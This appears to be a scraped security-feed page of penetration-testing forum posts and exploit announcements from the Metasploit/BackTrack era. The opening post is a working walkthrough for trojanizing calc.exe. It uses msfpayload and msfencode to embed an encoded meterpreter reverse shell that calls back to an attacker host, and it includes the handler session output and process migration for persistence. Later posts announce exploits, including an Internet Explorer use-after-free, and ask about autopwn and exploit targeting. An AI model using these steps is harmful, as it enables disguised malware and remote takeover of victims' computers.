-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template
Let's make our new backdoored executable.
~/trunk$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
Get the backdoored exe on the other box and execute it. We have a functional calc.exe and our shell.
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.210.11
LHOST => 192.168.210.11
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.210.11:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)
Keep in mind that you'll still need to migrate away from the backdoored executable process because if they close the exe you lose your shell.
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > run migrate explorer.exe
[*] Current server process: calc_backdoor.exe (3360)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1592
[*] New server process: Explorer.EXE (1592)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getpid
Current pid: 1592
meterpreter >
-
-
0:53
»
remote-exploit & backtrack
hi,
MS10-002 ,ie_iepeers (Microsoft Internet Explorer iepeers.dll use-after-free exploit )
4xsecurityteam.blogspot(dot)com (home page)
4xunderground.blogspot(dot)com
vimeo(dot)com/user1010000
thk$
-
-
21:00
»
Packet Storm Security Recent Files
This Metasploit module exploits a stack overflow in the USER verb in Open & Compact FTPd version 1.2. The program will crash once the payload is sent, so bind shell payloads are not effective.
-
21:00
»
Packet Storm Security Exploits
This Metasploit module exploits a stack overflow in the USER verb in Open & Compact FTPd version 1.2. The program will crash once the payload is sent, so bind shell payloads are not effective.
-
12:10
»
remote-exploit & backtrack
I've been playing around for the last few hours trying to get this working.
I've read many forum posts on different forums, but I still haven't got it working.
It doesn't help that all of the Fast-track websites are down, both "Secure State" and "The Pen Test".
I've done all sorts of weird stuff like create a user called "postgres", and I can't count many ruby libraries I've installed.
Here's some of the guides I've followed:
Automate Your Pen Testing with Fast-Track and Linux - www.enterprisenetworkingplanet.com
The Bored IT Guy » How to install Fast-Track 4.0 on Ubuntu
[ubuntu] How to: metasploit with autopwn [Archive] - Ubuntu Forums
Here's the versions I'm working with:
Metasploit v3.3.4-dev
Fast-track v4.0
When I run Fast-track, it tests for dependencies and everything comes back OK except for
pymills. I searched the web for
pymills and it seems to have disappeared into a black hole, seems like the Russians came and kidnapped the developers.
If I do:
Code:
python fast-track.py -i
Enter 2 for Autopwn.
Enter the IP address.
Enter 2 for Reverse Binding.
Then it loads Metasploit but here's what I get, check out the errors in red:
Code:
msf > db_destroy pentest
dropdb: could not connect to database postgres: FATAL: Ident authentication failed for user "root"
msf > db_create pentest
createdb: could not connect to database postgres: FATAL: Ident authentication failed for user "postgres"
[-] Error while running command db_create: Failed to connect to the database: FATAL: Ident authentication failed for user "postgres"
Call stack:
/root/metasploit/lib/msf/ui/console/command_dispatcher/db.rb:1552:in `db_create_postgresql'
/root/metasploit/lib/msf/ui/console/command_dispatcher/db.rb:1078:in `send'
/root/metasploit/lib/msf/ui/console/command_dispatcher/db.rb:1078:in `cmd_db_create'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:239:in `send'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:239:in `run_command'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:201:in `run_single'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:195:in `each'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:195:in `run_single'
/root/metasploit/lib/rex/ui/text/shell.rb:144:in `run'
/root/metasploit/msfconsole:93
msf > db_nmap 192.168.1.111
[-] Unknown command: db_nmap.
msf > db_autopwn -p -t -e -r
[-] Unknown command: db_autopwn.
msf > sleep 5
msf > jobs -K
Stopping all jobs...
Anyone got any ideas?
-
-
10:43
»
remote-exploit & backtrack
Hola señores bueno pues ahora llego yo con un videotuto que se trata de explotar una vulnerabilidad que se encuentra en el puerto 445 de Windows 7 este bug ya lo vi el el foro publicado por Progresive Death no queda de mas aclarar que el lo ejecuta desde el codigo fuente mas yo no yo lo ejecuto desde el metasploit directamente por esa razon lo monte y bueno lo que vamos a hacer es obtener el famoso pantallazo azul en nuestra maquina victima espero les guste el video gracias.
Video
youtube.com/user/sOrtHacK#p/u/2/VwYJ60K16LI
-
-
12:40
»
remote-exploit & backtrack
[*] Automatically detecting the target...[*] Fingerprint: Windows 2003 Service Pack 1 - lang:Unknown[*] Could not determine the exact language pack[*] Exploit completed, but no session was created.
Exploit target:
Id Name
-- ----
0 Automatic Targeting
How can i manually select the version of it + language?
my 2nd question is how do i run the GUI of metasploit in windows?
Thanks.
OSVDB Vulnerabilities
Bugtraq
Penetration Testing
The Exploitant
